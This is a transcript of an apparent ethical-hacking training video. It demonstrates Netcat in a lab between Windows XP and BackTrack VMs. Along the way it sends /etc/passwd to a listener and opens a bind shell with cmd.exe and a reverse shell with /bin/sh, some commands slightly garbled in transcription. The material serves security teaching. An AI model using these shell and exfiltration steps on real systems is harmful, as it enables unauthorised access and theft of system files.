I have two VMs up, and they're not full screen because I want to be able to show you the output on both screens. I have an XP box up that's sitting on 163.129 and a backtrack box, a backtrack 5R3 box. And what we're going to do is demonstrate Netcat. Now, Netcat is a multi-purpose tool, and it's basically a raw network packet transfer, anything you can think of kind of tool. It sends network data back and forth between two hosts. It basically opens up a network connection and sends it. And there's all kinds of things you can do with Netcat legitimately, but hackers use it to transfer files, to get command shells, to communicate with users, to send malware across to another host, and so forth. So if you're going to be a CEH and a hacker, and really a network security professional in general, you need to understand how Netcat works. Now, most antiviruses will pick up Netcat as a Trojan, so be careful of it. Only run it on machines that you know you need to. Okay, so that's my word of caution. So we can type in nc-h to get the Netcat help, and it's a very simple command to run, very simple switches. The important things that you need are a port to listen on, and you can have the listener, which is usually the victim, listen on a port, and it'll listen for any connections to that port and put them through Netcat to the host. So let's go ahead and do that. Let's nc-l, and we're going to do a V for verbose and a P to establish the port number. And that we're just going to use an arbitrary port, 3333. You should use something that something else is not using, just to test with. Okay, it's listening. Now on the backtrack box over here, we just simply type in nc 192.168.163.129, and we have to specify the same port. And so now it's listening. So from here, I could start a chat session. And if you'll see over here, you'll see where it established a connection. And I'm just going to say, hello. And it appears on the other side. It's like a little conversation. So you can actually use it to communicate. Okay, let's do Control-C. Now let's send a file across. So let's start Netcat Listener again. In this case, I'm going to actually, any input that Netcat gets, I'm going to send it to a file. So I'm going to direct this to C:// and we'll put it in the same directory, tools, and nc111nt/test.txt. So we've got our listener set up. And over here, let's send the etc password file, for example. So we would say nc 192.168.163.129.3333, and we're going to send through the input redirector /etc/password. And so it has sent that file across the network. So let's do a Control-C here. Let's go back over here and do a directory. And we see that there is a file here that's test.txt. So let's notepad that. And we got the actual etc password file here. So we transferred the file over. Now keep in mind that could have been a piece of malware. So that's how easy that is. The next thing I want to do is show you how to get a command shell. And we're going to get a command shell, bind a shell as it were, or bind a program, and it doesn't have to be a shell. And we're going to do this on this end. On the listener or victim, you simply type in -e and the command that you want to run, cmd.exe, of course, for Windows. And I'm going to say enter. And then on this side, on the backtrack side, I'm going to simply run it the way I normally do to connect. So I hit that, and we give it a second to connect here. And all of a sudden, guess what I've got? A Windows XP command shell on my backtrack box. And I can do a directory, I can change directories, I can do anything. I can run any Windows program. So now I could actually create a user account on the Windows box if I wanted to, using the command line. So I can actually do quite a bit there. And let me move this up so you can see it a little bit. So I've got my directory here now. All I have to do basically is Control-C to break that connection. Now I can also get a reverse command shell. And basically that just simply involves running the listener like normal, on the Windows XP side. And then on this side, doing the same thing, only the -E/bin shell and hitting enter. And on the Windows XP side now, I've actually got a shell, but it doesn't tell me that straight up. You actually can just start typing. So I could do an ls and get the directory of the backtrack box. And I can do a cd ... ls. I can run any commands I want. cd/pentest ls. And now I'm in the backtrack box. So I have a reverse command shell now. So you can see that Netcat is very useful and hackers can use it for a lot of things. And Netcat is one of the most popularly used programs to get system access and wage a system attack on a box. And you can use it on Windows or Linux. So a little bit more about attacking a system using a piece of software, malware, or in this case, Netcat.